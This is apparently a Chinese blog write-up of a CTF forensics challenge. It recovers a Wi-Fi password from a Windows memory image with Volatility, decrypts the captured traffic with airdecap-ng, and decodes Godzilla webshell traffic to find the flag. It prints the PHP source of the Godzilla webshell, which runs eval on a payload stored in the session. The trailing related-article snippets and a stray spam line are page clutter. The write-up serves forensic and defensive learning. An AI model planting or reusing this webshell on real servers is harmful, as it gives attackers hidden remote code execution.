<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    《【隴劍杯WP】wifi題解》

    VSole2021-09-19 14:02:33

    wifi題,是一個師傅快結束的時候丟給我的。那貨啥也不說,丟了一串密文過來,后面才知道是哥斯拉,他解題的方法比較強(邪門),我就老老實實根據哥斯拉的加密逆過去了。

    題目

    網管小王最近喜歡上了ctf網絡安全競賽,他使用“哥斯拉”木馬來玩玩upload-labs,并且保存了內存鏡像、wifi流量和服務器流量,讓您來分析后作答:(本題僅1小問)

    小王往upload-labs上傳木馬后進行了cat /flag,flag內容為_____________。(壓縮包里有解壓密碼的提示,需要額外添加花括號)。 

    觀察&題解

    說實在,這個wifi題屬于電子取證類型,一開始我也沒啥頭緒怎么下手。

    1.確認信息

    服務器pcap,包序27之前基本都是加密流量,沒啥好看的

    但是在包序27的地方上傳了馬

    客戶端的pcap,很規律的加密,但是我們仍能找到有用的信息:

    SSID=My_Wifi、HuaweiDe_4c:55:ec、flage

    剩下一個東西就是:windows7-dde00fa9.vmem,這屬于VM的東西,突破口就在這里了。

    丟kali里面用Volatility,插件不插件這題無所謂啊,我都沒搞。【有個坑,2021的kali好像不自帶這東西】

    2.取證過程(圖片太糊見諒,虛擬機里的)

    到這一步, 要咋搞呢。 其實還是內存取證,取證就是信息收集,只是換了一個方法就是——分離。 我這里比較懶,直接py文件調用。


    vol.py -f Windows\ 7-dde00fa9.vmem  imageinfo 
    

    看看基本信息,忽略那堆報錯,我沒調用插件導致的。 Win7SP1x86_23418/pe格式

        

    因為這題是wifi題,題干中又說在靶場里傳馬子,上面識別出來是windows機器,看看他有沒有做網絡配置了

    vol.py -f Windows\ 7-dde00fa9.vmem  --profile=Win7SP1x86_23418 cmdscan
    

    這是比較理想狀態下,我們直接查cmd命令執行了什么,似乎真的做了配置,而且export(導出)了!

    辣就梭哈文件了,win嘛直接梭哈一波rar和zip就行了

    vol.py -f Windows\ 7-dde00fa9.vmem  --profile=Win7SP1x86_23418 filescan |grep -E "rar|zip"
    

    東西有點多,但是看到了熟悉的名字My_Wifi.zip,就是客戶端pcap里的SSID了!

    其他就先不管,先把My_Wifi.zip分離出來,看看是個啥。

    vol.py -f Windows\ 7-dde00fa9.vmem  --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000003fdc38c8 -D ./
    

    D就是 dir的意思,./就是導出在本地。 導出是.dat文件,而且還加密了! 肯定有貓膩啦!

    至于怎么解碼,這個好玩了,我和某位師傅在斗法。我也有點懵,解出來是0kb。

    找密碼的時候,我很雞賊的換了win的環境,因為被某個大神坑習慣了,他密碼從來都在描述里,所以我丟到我的win環境里看。描述信息有東西哇,密碼在網卡的GUID里。

    網工人都知道網卡的GUID和接口綁定,上面那位師傅直接grep { 梭哈了。 我 就一條命令完事,直接查接口!

    vol.py -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 filescan | grep "Interfaces"
    

    記住! ! 把花括號也填進去,題干說的! ! ! 我上面解壓出0kb就是我沒把花括號丟進去。

    解壓出來是xml文件,看看里面有啥東西吧。 AES、passPhrase、 233@114514_qwe ,應該是某個加密文件的密碼,題目里也只剩下一個東西被加密了,那就是客戶端pcap了。

    無線方面kali也有工具,用最普通的工具去跑——airdecap-ng

    airdecap-ng -e My_Wifi -p 233@114514_qwe  khd.cap
    

    參數怎么來的呢 -e 指定目標網絡ssid,-p 密碼

    SSID=My_Wifi,密碼233@114514_qwe,那么也銜接上了xml就是用來解碼這個包的!

    對比一下兩個包

    解碼前

    解碼后

    3.流量分析&木馬分析

    不得不說,這里追包蠻累的,服務端一大堆一大堆的。

    服務端追到包序26、27,會發現明顯的分界線。結合題干,應該就是傳馬的地方了。

    不多說,直接解開吧,順序 urldecode->rev(翻轉) -> base64

    我覺得上次寫蟻劍的不夠直觀,我直接放代碼塊里寫算了。

    我覺得上次寫蟻劍的不夠直觀,我直接放代碼塊里寫算了。

    @session_start();//創建會話@set_time_limit(0);//防超時@error_reporting(0);//關閉報錯頁function encode($D,$K){    for($i=0;$i<strlen($D);$i++) {        $c = $K[$i+1&15];        $D[$i] = $D[$i]^$c;    }    return $D;}//加密算法,對$D進行加密$pass='key';$payloadName='payload';$key='3c6e0b8a9c15224a';//這里是簡化了馬子,本來是三個參數再進行下面的運算if (isset($_POST[$pass])){    $data=encode(base64_decode($_POST[$pass]),$key);//base64加密    if (isset($_SESSION[$payloadName])){        $payload=encode($_SESSION[$payloadName],$key);        eval($payload);//session中的eval函數記錄payload,這里是哥斯拉的強特征        echo substr(md5($pass.$key),0,16);        echo base64_encode(encode(@run($data),$key));        echo substr(md5($pass.$key),16);//前后16位是md5,中間是base64加密    }else{        if (stripos($data,"getBasicsInfo")!==false){            $_SESSION[$payloadName]=encode($data,$key);        }//將payload存入session中    }}
    

    就地取材啊,官方都寫好給你了,就直接用官方的解吧。 在解密后的客戶端pacp追包到包序1198,即是最后一個會話。 進行提取。

    不要拒絕官方的好意,直接拉過來用,配合一下gzdecode函數就完事了。我太久沒寫php了,Print一直敲成printf,最近在搗鼓逆向,偽代碼看多了。

    <?phpfunction encode($D,$K){   for($i=0;$i<strlen($D);$i++) {       $c = $K[$i+1&15];       $D[$i] = $D[$i]^$c;    }   return $D;}$a='fL1tMGI4YTljMn75e3jOBS5/V31Qd1NxKQMCe3h4KwFQfVAEVworCi0FfgB+BlWZhjRlQuTIIB5jMTU=';echo gzdecode(encode(base64_decode($a),'3c6e0b8a9c15224a'));?>
    

    在線php執行網站,選5.x的就行,跑一下結果就出來了。

    電子取證

    電子取證也是屬于藍隊 的一部分,可以獨立出來作為一個技術分支,也可以歸入應急響應里面。 我電子取證方面還是挺菜雞的,這題也是靠線索關聯堆起來的。 如果各位師傅有什么新思路或者新工具可以留言啊,多多益善!

    最后解哥斯拉的方法,和我對線的師傅他們是直接用放進哥斯拉里面,然后讓哥斯拉幫忙解碼,看到flag的,不得不說是一種很好的方法! 我這里是從馬子入手去分析,希望對各位有幫助。

    我后續會把之前應急響應日志分析那篇填上,然后這次比賽的其他wp也會陸續更新。 最近也是比較忙的,見諒。

    我只是一個還在成長的安全分析師和隨叫隨到的應急響應工程師,有疑問和合作請各位大佬留言。

    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    wifi題,是一個師傅快結束的時候丟給我的。那貨啥也不說,丟了一串密文過來,后面才知道是哥斯拉,他解題的方法比較強(邪門),我就老老實實根據哥斯拉的加密逆過去了。
    此次大賽的最大特點是以真實數字化業務場景構筑了大規模、高仿真的數字安全防御演練場,打造了全國首個“以防為主”的國家級網安賽事。
    作為國家級網絡安全大賽,“”重點聚焦數字經濟時代下的網絡安全守護。大賽將立足“聯絡四域、襟帶萬里”的交通樞紐和軍事要塞甘肅蘭州,面向全國奏響“守護數字安全,構建清朗空間”主題進行曲,以實景防御、大數據分析、人工智能安全等綜合防御能力提升為目標,打造高規格、高標準、高水平的全國性網絡安全賽事活動,為數字化改革鍛造網絡安全人才,提升網絡安全實戰能力,護航數字生產力飛天,時代安全感落地,全面筑牢數
    作為首次聚焦數字安全防護的國家級網絡安全大賽,首屆“”自報名啟動以來持續受到社會各方的熱切關注與支持。據大賽組委會統計,截止9月9日上午10時,報名人數已近7000人,戰隊總數突破2000支,全面覆蓋國家31個省級行政區(港澳臺除外)的重要行業單位、院校、科研機構、網絡安全企業、互聯網企業以及社會力量等。
    眾多國家級賽事基于平行仿真技術,構建關鍵信息基礎設施等行業仿真場景,打造大規模、高仿真、全場景的實戰演練場進行攻防訓練。同時,第五屆“強網”青少年專項賽線上選拔賽也在當日圓滿落下帷幕。作為新一代關鍵技術基座和“數字孿生”的重要基礎之一,平行仿真技術正與未來國家安全共塑,必將
    寫在前面關于無字母數字Webshell這個話題,可以說是老生常談了。之前打 CTF 的時候也經常會遇到,每次都讓人頭大,所謂無字符webshell,其基本原型就是對以下代碼的繞過:見午牛手毛氣升長仁什片仆化仇幣仍僅斤爪反介父從今兇分乏公倉月氏勿欠風丹勻烏鳳
    工業和信息化部信息通信發展司一級巡視員劉郁林,深圳市工業和信息化局黨組成員、副局長何志梅,深圳市龍華區區長雷衛華等領導出席本次大賽并致辭。本屆大賽共設置了14個區域賽、28個專題賽、1個標桿賽和1個國際專題邀請賽,歷時2個多月的項目征集,共收到參賽項目超28000個。全國賽總決賽參賽項目通過路演與答辯相結合的形式展開激烈角逐,最終遴選出一等獎16名、二等獎32名。
    前言最近一段時間忙于學習JAVA安全以及企業SRC挖掘,很少開展比較完整的滲透測試了。前一段時間高中的老師再次找到我,讓我再次對學校的系統進行一些測試,核心目標是獲取全校師生數據以及校園網的運行數據,最后也是成功拿下。點進去一看,感覺還是有東西的,因為能查成績、能查校園卡消費等等,這一切基本都說明這個系統和校園網有著千絲萬縷的聯系。Ueditor,asp.net站點看到這玩意,十有八九是穩了。
    國務院新聞辦公室1月20日舉行新聞發布會,介紹2021年工業和信息化發展情況。發布會由國務院新聞辦新聞局局長、新聞發言人陳文俊主持。三是新興產業保持了快發展,高技術制造業、裝備制造業的帶動作用增強,發展快。行業監管創新拓展,取得了實效。兩地三賽區所有的場館目前已經實現了5G的全覆蓋,為賽事云轉播、智慧冬奧提供了有力支撐和保障。
    中關村區塊鏈產業聯盟亮相PT展,展示了聯盟會員單位在區塊鏈ICT領域的風采及區塊鏈技術在各行各業的創新應用。工業和信息化部信息技術發展司副司長王偉,遼寧省通信管理局黨組書記、局長付旋,中國信通院總工程師魏然出席大會并致辭 。在各界的共同努力下,我國區塊鏈產業取得積極進展。他表示,區塊鏈技術需要我們圍繞共同的標準、協議和軟件來提振全球經濟,應對全球挑戰。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类